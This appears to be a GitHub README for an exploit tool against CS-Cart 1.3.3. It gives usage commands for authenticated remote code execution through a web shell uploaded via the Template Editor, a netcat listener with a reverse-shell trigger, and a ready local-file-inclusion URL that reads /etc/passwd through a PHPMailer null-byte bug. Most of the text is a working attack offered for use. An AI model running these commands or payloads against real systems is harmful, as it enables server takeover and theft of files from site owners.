Developed by: Strikoder
Tested on: CS-Cart 1.3.3
Multi-purpose exploitation tool for CS-Cart vulnerabilities including authenticated RCE via Template Editor upload and LFI via PHPMailer.
- Authenticated RCE - Upload malicious .phtml files through Template Editor
- Reverse Shell - Multiple methods including base64 encoded bash, Python, and netcat variants
- Command Execution - Execute single commands or interactive shell mode
- LFI Exploitation - Read arbitrary files via PHPMailer class vulnerability
Option 1: Git Clone
git clone https://github.com/strikoder/cscart-rce-lfi-exploit
cd cscart-rce-lfi-exploit
pip3 install requestsOption 2: Direct Download
wget https://raw.githubusercontent.com/strikoder/cscart-rce-lfi-exploit/main/cscart_exploit.py
pip3 install requestspython3 cscart_exploit.py -t http://target.com -u admin -p admin -c "id"python3 cscart_exploit.py -t http://target.com --lfi /etc/passwd# Start listener first
nc -lvnp 443
# Trigger reverse shell
python3 cscart_exploit.py -t http://target.com -u admin -p admin -i YOUR_IP 443-t, --target Target URL (required)
-u, --username Admin username (default: admin)
-p, --password Admin password (default: admin)
-s, --shell-name Shell filename without extension (default: shell)
-c, --command Execute single command
-i, --interactive Reverse shell mode (IP PORT)
--lfi LFI mode - read file path
- Authenticate to
/admin.phpwith provided credentials - Upload .phtml file to Template Editor endpoint
- File is stored in
/skins/directory - Access shell at
http://target/skins/shellname.phtml?cmd=command
The PHPMailer class includes files based on the classes_dir parameter without proper validation:
http://target/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../etc/passwd%00
Null byte (%00) truncates the path and bypasses extension checks.
Strikoder